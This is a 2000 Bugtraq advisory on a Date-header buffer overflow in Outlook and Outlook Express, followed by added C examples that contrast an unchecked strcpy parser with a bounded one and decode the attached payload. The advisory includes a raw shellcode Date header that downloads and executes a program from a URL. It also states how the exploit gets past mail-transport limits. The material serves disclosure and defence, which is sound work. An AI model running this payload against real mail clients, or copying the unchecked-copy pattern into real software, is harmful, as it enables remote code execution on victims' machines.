Bugtraq mailing list archives
Buffer Overflow in MS Outlook Email Clients
From: ripper () HOTKEY NET AU (Aaron Drew)
Date: Wed, 19 Jul 2000 20:02:27 +1000
_______________________________________________________________

Security Advisory: Buffer Overflow in MS Outlook & Outlook Express Email Clients

Date: 18th July 2000
Author: Aaron Drew (mailto:ripper () wollongong hotkey net au)
Versions Affected: MS Outlook 97/2000 and MS Outlook Express 4/5

_______________________________________________________________

A bug in a shared component of Microsoft Outlook and Outlook Express mail clients can allow a remote user to write arbitrary data to the stack. This bug has been found to exist in all versions of MS Outlook and Outlook Express on both Windows 95/98 and Windows NT 4.

The vulnerability lies in the parsing of the GMT section of the date field in the header of an email. Bounds checking on the token representing the GMT is not properly handled. This bug can be witnessed by opening an email with an exceptionally long string directly preceding the GMT specification in the Date header field, such as:

Date: Fri, 13 July 2000 14:16:06 +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

The bug lies in the shared library INETCOMM.DLL and has been successfully exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.

The execution of this code is performed differently under each client. Under Outlook Express, the buffer overflow occurs as soon as the user tries to view the mail folder containing email with a malicious date header. Under Microsoft Outlook, the overflow occurs when attempting to preview, read, reply to or forward any email with a malicious date header. Under MS Outlook a user may delete or save an email to disk without exploitation.

Whilst some mail transport systems seem to modify 8-bit header data or lines over 70 characters in length, preventing direct exploitation, these restrictions seem to be avoided by encoding a message with an exploit date field as a MIME attachment in Outlook's MIME attached message format. These messages also overflow the stack when read, previewed, replied to or forwarded.

Microsoft was notified of this bug on July 3.

Attached is a proof-of-point exploit that, when placed in the header field of a message or MIME attached message, will download and execute an executable from the web. (In this particular case it will launch MS Freecell.)

_______________________________________________________________

DISCLAIMER

The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility.

_______________________________________________________________

Date: Sun, 7 May 2000 11:20:46 +10006ÝÃ^@Ç^à Ä-qþÿÿì3ɱ¡H0âúè¾À^PPÿðÝ3íûfïþü3ÉéûC2À×ÀuøCQSVÿÀ^«YâêC2À×ÀuøCSÿÀ^ð3ÉéüC2À×ÀuøCQSVÿÀ^«Yâê3ÀfHÑà3ÒPRÿWìð3ÒRRRRRÿWð3ÒRRRR×ÂÜþÿÿRPÿWøW3ÒfJÑâRVPÿWü3ÒR×ÂöþÿÿRÿWÜÿ7VPØÿWàSÿWä3ÒBR×ÂöþÿÿRÿWèPÿ¬À^ËÅÒÎÅ̳²ßìãòåáôßì÷òéôåßìãìïóå×éîÅøåãÇìïâáìÁììïã×ÉÎÉÎÅÔÉîôåòîåôÏðåîÁÉîôåòîåôÃìïóåÈáîäìåÉîôåòîåôÏðåîÕòìÁÉîôåòîåôÒåáäÆéìåèôô𺯯±¹²®±¶¸®°°±®°±°¯ôåóô®åøå
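The following is an added example, not code from the advisory or from Microsoft: a toy RFC 822 Date-header zone parser that models the bug class the advisory describes. INETCOMM.DLL's actual code is not public, so the vulnerable function below reproduces the pattern (token copied into a fixed-size stack buffer with no length check), not the binary. The buffer size, the accepted zone forms and the sample headers are all assumptions made for the example.

```c
/* Added example (not from the advisory): a toy Date-header zone parser
 * showing the unchecked copy the advisory describes next to a bounded
 * version.  Build: cc -std=c99 -Wall zone.c
 */
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

#define ZONE_MAX     5        /* longest legal numeric zone: "+HHMM" */
#define ZONE_INVALID INT_MIN  /* returned when the header is rejected */

/* The zone token is whatever follows the last space of the Date value
 * (e.g. "+1000" in "Date: Fri, 13 July 2000 14:16:06 +1000").  Input is
 * assumed to have its CRLF already stripped. */
static const char *zone_token(const char *date, size_t *len)
{
    const char *sp = strrchr(date, ' ');
    const char *tok = sp ? sp + 1 : date;
    *len = strlen(tok);
    return tok;
}

/* Convert an already-bounded token to minutes east of UTC.  Accepts
 * "GMT"/"UT"/"UTC" and "+HHMM"/"-HHMM"; anything else is rejected. */
static int zone_to_minutes(const char *zone)
{
    if (!strcmp(zone, "GMT") || !strcmp(zone, "UT") || !strcmp(zone, "UTC"))
        return 0;
    if ((zone[0] != '+' && zone[0] != '-') || strlen(zone) != 5)
        return ZONE_INVALID;
    for (int i = 1; i < 5; i++)
        if (!isdigit((unsigned char)zone[i]))
            return ZONE_INVALID;
    int hh = (zone[1] - '0') * 10 + (zone[2] - '0');
    int mm = (zone[3] - '0') * 10 + (zone[4] - '0');
    if (hh > 23 || mm > 59)
        return ZONE_INVALID;
    return (zone[0] == '-' ? -1 : 1) * (hh * 60 + mm);
}

/* VULNERABLE pattern: the token length is never compared with the
 * destination size.  A token shaped like the advisory's "+1000xxxx..."
 * runs off the end of `zone` into the saved frame pointer and return
 * address.  Kept only for comparison; never feed it untrusted headers. */
int parse_zone_unsafe(const char *date)
{
    char zone[ZONE_MAX + 1];
    size_t len;
    const char *tok = zone_token(date, &len);
    strcpy(zone, tok);                 /* the missing bounds check */
    return zone_to_minutes(zone);
}

/* HARDENED: compare the length with the destination before copying and
 * reject oversize tokens outright, so the long header from the advisory
 * is refused before any byte reaches the stack buffer. */
int parse_zone_safe(const char *date)
{
    char zone[ZONE_MAX + 1];
    size_t len;
    const char *tok = zone_token(date, &len);
    if (len == 0 || len > ZONE_MAX)
        return ZONE_INVALID;
    memcpy(zone, tok, len);
    zone[len] = '\0';
    return zone_to_minutes(zone);
}

int main(void)
{
    /* Constructed inputs: a benign header and one shaped like the
     * advisory's trigger (a long run of 'x' after the zone). */
    const char *benign  = "Date: Fri, 13 July 2000 14:16:06 +1000";
    const char *trigger = "Date: Fri, 13 July 2000 14:16:06 +1000"
                          "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

    printf("benign  -> %d minutes east of UTC\n", parse_zone_safe(benign));
    printf("trigger -> %s\n",
           parse_zone_safe(trigger) == ZONE_INVALID ? "rejected" : "accepted");
    /* parse_zone_unsafe(trigger) would smash the stack; deliberately not called. */
    return 0;
}
```

The same length check, applied at a mail gateway rather than in the client, is a usable detection rule for this advisory: any Date header whose final token is longer than ZONE_MAX characters is malformed under RFC 822 and worth quarantining regardless of what follows it.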
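A second added example, again not part of the advisory: triage of the payload shown above. Every character in the trailing run of the blob (from "ËÅÒÎÅ̳²" to the end) is a Latin-1 character whose byte value has the high bit set; clearing that bit (XOR 0x80) turns the run into plain ASCII, which is how the payload keeps its import names and download URL free of NUL bytes. The byte array below is transcribed from the characters on this page; any separators between entries did not survive the rendering, so the decoder simply stops at the first byte without the high bit and the result is searched rather than split. The decoding is this editor's analysis, not a statement from the author.

```c
/* Added example (not from the advisory): recover the ASCII string table
 * from the tail of the proof-of-concept payload by clearing the high bit
 * of each byte.  Build: cc -std=c99 -Wall decode.c
 */
#include <stdio.h>
#include <string.h>

/* Byte values of the Latin-1 characters in the payload's trailing run,
 * transcribed from the page.  Constructed here for the example. */
static const unsigned char PAYLOAD_TAIL[] = {
    0xCB,0xC5,0xD2,0xCE,0xC5,0xCC,0xB3,0xB2,                      /* ËÅÒÎÅ̳² */
    0xDF,0xEC,0xE3,0xF2,0xE5,0xE1,0xF4,                           /* ßìãòåáô */
    0xDF,0xEC,0xF7,0xF2,0xE9,0xF4,0xE5,                           /* ßì÷òéôå */
    0xDF,0xEC,0xE3,0xEC,0xEF,0xF3,0xE5,                           /* ßìãìïóå */
    0xD7,0xE9,0xEE,0xC5,0xF8,0xE5,0xE3,                           /* ×éîÅøåã */
    0xC7,0xEC,0xEF,0xE2,0xE1,0xEC,0xC1,0xEC,0xEC,0xEF,0xE3,       /* ÇìïâáìÁììïã */
    0xD7,0xC9,0xCE,0xC9,0xCE,0xC5,0xD4,                           /* ×ÉÎÉÎÅÔ */
    0xC9,0xEE,0xF4,0xE5,0xF2,0xEE,0xE5,0xF4,0xCF,0xF0,0xE5,0xEE,0xC1,   /* ÉîôåòîåôÏðåîÁ */
    0xC9,0xEE,0xF4,0xE5,0xF2,0xEE,0xE5,0xF4,0xC3,0xEC,0xEF,0xF3,0xE5,
    0xC8,0xE1,0xEE,0xE4,0xEC,0xE5,                                /* ÉîôåòîåôÃìïóåÈáîäìå */
    0xC9,0xEE,0xF4,0xE5,0xF2,0xEE,0xE5,0xF4,0xCF,0xF0,0xE5,0xEE,
    0xD5,0xF2,0xEC,0xC1,                                          /* ÉîôåòîåôÏðåîÕòìÁ */
    0xC9,0xEE,0xF4,0xE5,0xF2,0xEE,0xE5,0xF4,0xD2,0xE5,0xE1,0xE4,
    0xC6,0xE9,0xEC,0xE5,                                          /* ÉîôåòîåôÒåáäÆéìå */
    0xE8,0xF4,0xF4,0xF0,0xBA,0xAF,0xAF,0xB1,0xB9,0xB2,0xAE,0xB1,0xB6,
    0xB8,0xAE,0xB0,0xB0,0xB1,0xAE,0xB0,0xB1,0xB0,0xAF,            /* èôô𺯯±¹²®±¶¸®°°±®°±°¯ */
    0xF4,0xE5,0xF3,0xF4,0xAE,0xE5,0xF8,0xE5                       /* ôåóô®åøå */
};

/* XOR each byte with 0x80 while the high bit is set; stop at the first
 * byte without it (a separator or a code byte).  Writes a NUL-terminated
 * string into `out` and returns the number of bytes decoded. */
size_t decode_hi_ascii(const unsigned char *in, size_t n, char *out, size_t outsz)
{
    size_t i;
    for (i = 0; i < n && i + 1 < outsz; i++) {
        if (!(in[i] & 0x80))
            break;
        out[i] = (char)(in[i] ^ 0x80);
    }
    out[i] = '\0';
    return i;
}

/* Does the decoded tail contain the given import name or literal? */
int payload_tail_mentions(const char *name)
{
    char text[sizeof PAYLOAD_TAIL + 1];
    decode_hi_ascii(PAYLOAD_TAIL, sizeof PAYLOAD_TAIL, text, sizeof text);
    return strstr(text, name) != NULL;
}

/* Copy the download URL (from "http://" to the end of the run, since no
 * terminator survived the rendering) into `out`; NULL if none is found. */
const char *payload_url(char *out, size_t outsz)
{
    char text[sizeof PAYLOAD_TAIL + 1];
    decode_hi_ascii(PAYLOAD_TAIL, sizeof PAYLOAD_TAIL, text, sizeof text);
    const char *p = strstr(text, "http://");
    if (!p)
        return NULL;
    snprintf(out, outsz, "%s", p);
    return out;
}

int main(void)
{
    char text[sizeof PAYLOAD_TAIL + 1];
    char url[64];
    decode_hi_ascii(PAYLOAD_TAIL, sizeof PAYLOAD_TAIL, text, sizeof text);
    printf("decoded tail: %s\n", text);
    printf("download URL: %s\n", payload_url(url, sizeof url) ? url : "(none)");
    return 0;
}
```

The decoded names (KERNEL32 with _lcreat, _lwrite, _lclose, WinExec and GlobalAlloc; WININET with InternetOpenA, InternetOpenUrlA, InternetReadFile and InternetCloseHandle) match the behaviour the advisory states, fetch an executable over HTTP and run it, and give a defender concrete strings to hunt for in captured mail; the URL points at a private RFC 1918 address, consistent with a lab demonstration rather than a live drop site.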